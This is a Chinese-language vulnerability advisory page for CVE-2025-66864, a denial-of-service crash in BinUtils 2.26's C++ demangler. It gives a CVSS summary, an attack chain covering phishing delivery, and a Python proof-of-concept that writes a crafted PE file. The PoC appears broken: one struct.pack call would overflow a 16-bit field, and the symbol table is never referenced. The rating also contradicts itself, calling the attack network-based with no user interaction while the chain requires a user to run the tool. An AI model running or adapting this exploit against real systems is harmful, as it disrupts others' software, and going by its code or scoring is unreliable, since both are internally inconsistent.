CVE-2025-66864 BinUtils cp-demangle.c拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-66864

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

BinUtils 2.26

漏洞概述

CVE-2025-66864是BinUtils 2.26版本中的一个拒绝服务漏洞。该漏洞位于cp-demangle.c文件中的d_print_comp_inner函数，由于对精心构造的PE文件处理不当，可能导致程序崩溃或服务中断。攻击者无需任何认证即可通过网络触发此漏洞，对系统的可用性造成严重影响。CVSS评分7.5分，属于高危漏洞。攻击向量为网络层面，无需用户交互，攻击复杂度低，具有较高的可利用性。

技术细节

该漏洞存在于GNU BinUtils的C++名称解码组件中。d_print_comp_inner函数在处理C++修饰名称（mangled name）时，未对输入数据进行充分的边界检查。当解析包含恶意构造的RTTI（运行时类型信息）数据的PE可执行文件时，函数可能会访问无效内存地址，导致程序崩溃。具体表现为在处理模板参数或嵌套类型时，递归深度过大或缓冲区处理不当，最终引发栈溢出或堆溢出的拒绝服务条件。攻击者只需构造一个包含畸形符号表的PE文件，即可触发漏洞。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意构造的C++修饰名称的PE可执行文件，该名称在d_print_comp_inner函数中触发异常处理逻辑

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意下载链接或水坑攻击等方式将恶意PE文件分发给目标用户

STEP 3

步骤3

目标用户使用BinUtils工具（如cxxfilt、nm、readelf）处理该PE文件

STEP 4

步骤4

BinUtils的cp-demangle组件调用d_print_comp_inner函数解析畸形符号表

STEP 5

步骤5

函数因递归深度过大或内存访问越界导致栈溢出或程序崩溃，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-66864 PoC - BinUtils cp-demangle.c DoS
This PoC generates a crafted PE file that triggers the vulnerability
in d_print_comp_inner function in cp-demangle.c
"""

import struct
import sys

def create_malformed_symbol():
    """
    Generate a malformed C++ mangled name that triggers the vulnerability
    """
    # Crafted mangled name that causes stack overflow in d_print_comp_inner
    # This pattern causes excessive recursion in template parameter processing
    malicious_name = b'_ZN'  # Namespace prefix
    
    # Add deeply nested template parameters to cause recursion
    for i in range(100):
        malicious_name += b'1A'  # Class name 'A'
        malicious_name += b'IT'  # Template parameter
        malicious_name += b'1A'  # Nested template type
    
    malicious_name += b'E'  # End of nested name
    malicious_name += b'v'  # Void function
    
    return malicious_name

def create_crafted_pe():
    """
    Create a minimal PE file with crafted symbol table
    """
    pe_header = bytearray()
    
    # DOS Header
    pe_header += b'MZ'  # DOS signature
    pe_header += b'\x00' * 58
    pe_header += struct.pack('<I', 64)  # PE header offset
    
    # DOS Stub
    pe_header += b'This program cannot be run in DOS mode.\r\r\n\x00'
    
    # PE Signature
    pe_header += b'PE\x00\x00'
    
    # COFF Header
    pe_header += struct.pack('<H', 0x014c)  # Machine: i386
    pe_header += struct.pack('<H', 1)  # Number of sections
    pe_header += struct.pack('<I', 0)  # Time date stamp
    pe_header += struct.pack('<I', 0)  # Pointer to symbol table
    pe_header += struct.pack('<I', 0)  # Number of symbols
    pe_header += struct.pack('<H', 224)  # Size of optional header
    pe_header += struct.pack('<H', 0x0102)  # Characteristics
    
    # Optional Header
    pe_header += struct.pack('<H', 0x010b)  # Magic
    pe_header += b'\x00' * 18
    pe_header += struct.pack('<I', 0x1000)  # Image base
    pe_header += struct.pack('<I', 0x1000)  # Section alignment
    pe_header += struct.pack('<I', 0x200)  # File alignment
    pe_header += b'\x00' * 12
    pe_header += struct.pack('<H', 4)  # Number of RVA and sizes
    
    # Section Header (.text)
    pe_header += b'.text\x00\x00\x00'
    pe_header += struct.pack('<I', 0x1000)  # Virtual size
    pe_header += struct.pack('<I', 0x1000)  # Virtual address
    pe_header += struct.pack('<I', 0x200)  # Size of raw data
    pe_header += struct.pack('<I', 0x200)  # Pointer to raw data
    pe_header += struct.pack('<I', 0)  # Pointer to relocations
    pe_header += b'\x00' * 8  # Line numbers and checksum
    pe_header += struct.pack('<H', 0x60000020)  # Characteristics
    
    # Crafted symbol table with malicious mangled name
    symbol_data = create_malformed_symbol()
    pe_header += symbol_data
    
    return bytes(pe_header)

def main():
    print('[+] CVE-2025-66864 PoC Generator')
    print('[+] Target: BinUtils 2.26 - cp-demangle.c d_print_comp_inner')
    print('[+] Vulnerability: Denial of Service via crafted PE file')
    
    # Create the crafted PE file
    crafted_pe = create_crafted_pe()
    
    output_file = 'CVE-2025-66864_poc.exe'
    with open(output_file, 'wb') as f:
        f.write(crafted_pe)
    
    print(f'[+] Crafted PE file created: {output_file}')
    print('[+] Usage: Run cxxfilt or any BinUtils tool on this file')
    print('[+] Example: cxxfilt < CVE-2025-66864_poc.exe')

if __name__ == '__main__':
    main()

影响范围

BinUtils 2.26

防御指南

临时缓解措施

在官方修复版本发布前，建议限制对未知来源PE文件的使用，避免使用BinUtils工具处理来路不明的可执行文件。可考虑使用沙箱环境隔离处理可疑文件，并监控系统日志以便及时发现异常行为。